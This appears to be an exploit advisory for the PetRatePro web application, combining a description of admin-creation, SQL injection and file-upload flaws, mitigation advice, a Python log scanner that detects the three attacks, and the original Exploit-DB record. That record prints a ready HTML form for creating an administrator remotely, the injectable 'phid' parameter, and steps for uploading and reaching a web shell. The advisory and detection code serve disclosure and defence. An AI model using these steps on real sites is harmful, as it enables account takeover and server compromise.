Vendor: PetRatePro
By: DaOne (@LibyanCA)
CVSS: 7.5 (HIGH)
Vulnerability Types: Remote Add Admin, SQL Injection, Remote File Upload
CWE: 89, 89, 434
Product Name: PetRatePro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2012

Auxilium PetRatePro Multiple Vulnerabilities

Auxilium PetRatePro is vulnerable to Remote Add Admin, SQL Injection and Remote File Upload. The Remote Add Admin vulnerability allows an attacker to create a new administrator account by submitting a crafted form directly to the account-creation page. The SQL Injection vulnerability is exploitable through the 'phid' parameter of the 'viewcomments.php' page, which accepts attacker-controlled values. The Remote File Upload vulnerability allows an attacker to upload an arbitrary file, including a server-side script, through the 'upload_banners.php' page.

Mitigation:

Input validation should be performed on all user-supplied data before it reaches the database or the file system. The application should also be configured to reject uploaded files with suspicious extensions, and the banner directory should only serve images. Access to the administrative pages should be restricted to authenticated, trusted users.
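Because no patch exists, operators are left with monitoring. The following Python is an added detection example, not part of this advisory or of the Exploit-DB record: it scans web-server access logs in Apache "combined" format for the three issues described above (a POST to the admin-creation handler, a non-numeric 'phid' on viewcomments.php, and a script fetched from the banner directory after an upload) and correlates the upload-then-execute sequence per client. The web root '/PetRatePro/' and the sample log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache "combined" log format. They are not taken
# from the advisory; only the PetRatePro paths it names are reused.
SAMPLE_LOG = """\
198.51.100.4 - - [14/Sep/2012:10:00:01 +0000] "GET /PetRatePro/index.php HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2012:10:01:02 +0000] "POST /PetRatePro/admin/createnewadmin.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Sep/2012:10:01:09 +0000] "GET /PetRatePro/viewcomments.php?phid=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2012:10:01:15 +0000] "GET /PetRatePro/viewcomments.php?phid=12%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2012:10:02:30 +0000] "POST /PetRatePro/admin/sitebanners/upload_banners.php HTTP/1.1" 200 200 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2012:10:02:41 +0000] "GET /PetRatePro/banners/shell.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Sep/2012:10:03:00 +0000] "GET /PetRatePro/banners/summer.jpg HTTP/1.1" 200 18322 "-" "Mozilla/5.0"
"""

# Paths named in the advisory, under an assumed web root of "/PetRatePro/".
ADMIN_CREATE = "/PetRatePro/admin/createnewadmin.php"
VIEW_COMMENTS = "/PetRatePro/viewcomments.php"
BANNER_UPLOAD = "/PetRatePro/admin/sitebanners/upload_banners.php"
BANNER_DIR = "/PetRatePro/banners/"
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one combined-format line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": unquote(url.path),
        "query": parse_qs(url.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def classify(rec):
    """Map one request onto the advisory's three issues; returns (rule, detail) pairs."""
    path, query = rec["path"], rec["query"]
    findings = []
    # 1. Remote Add Admin: the advisory shows the creation form being submitted
    #    directly, so every POST to the handler deserves a review entry.
    if rec["method"] == "POST" and path == ADMIN_CREATE:
        findings.append(("admin_account_creation", "POST to createnewadmin.php"))
    # 2. SQL Injection: phid is a record id, so anything but digits is anomalous.
    if path == VIEW_COMMENTS:
        for value in query.get("phid", []):
            if not value.isdigit():
                findings.append(("phid_not_numeric", f"phid={value}"))
    # 3. Remote File Upload: record uploads, and flag any script fetched from
    #    the banner directory, which should only ever serve images.
    if rec["method"] == "POST" and path == BANNER_UPLOAD:
        findings.append(("banner_upload", "POST to upload_banners.php"))
    if path.startswith(BANNER_DIR) and path.lower().endswith(SCRIPT_EXT):
        findings.append(("script_in_banner_dir", path))
    return findings


def scan(log_text):
    """Run classify() over every parseable line; returns alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule, detail in classify(rec):
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "rule": rule, "detail": detail})
    return alerts


def correlate(alerts):
    """Return client IPs that uploaded a banner and later fetched a script from the
    banner directory: the upload-then-execute sequence the advisory describes."""
    uploaded, chained = set(), []
    for a in alerts:
        if a["rule"] == "banner_upload":
            uploaded.add(a["ip"])
        elif a["rule"] == "script_in_banner_dir" and a["ip"] in uploaded:
            if a["ip"] not in chained:
                chained.append(a["ip"])
    return chained


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["ip"]} {a["rule"]}: {a["detail"]}')
    print("upload-then-execute chains:", correlate(found))
```

The 'phid' rule deliberately flags any non-digit value rather than matching known injection strings, since the parameter is a record id and a strict type check has no false negatives for this endpoint. The admin-creation rule will also fire on legitimate administrator activity; the point is that on an unpatched install every such POST needs a human to confirm it was expected.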
Source (Exploit-DB raw data):

##########################################
[~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities
[~] Date: 14/09/2012
[~] Author: DaOne (@LibyanCA)
[~] Software Link: http://www.auxiliumsoftware.com
[~] Google Dork: "N/A"
##########################################

[#] 1-[Remote Add Admin]:

<form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();">
(Create New Administrator)
Username
<input name="username" type="text" id="name" size="20">
Password<input name="upassword" type="text" id="upassword" size="20">
Name<input name="name1" type="text" id="name1" size="20">
Email Address <input name="email" type="text" id="email" size="20">
<input type="submit" value="Create " name="B1">
</form>
[#] 2-[SQL Injection]

viewcomments.php parameter phid

http://localhost/PetRatePro/viewcomments.php?phid=[SQLi]
[#] 3-[Remote File Upload]

Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php
and upload your shell...
you will find the files here ... /PetRatePro/banners/shell.php

##########################################
[*] Contact me
www.facebook.com/DaOne.Ly
##########################################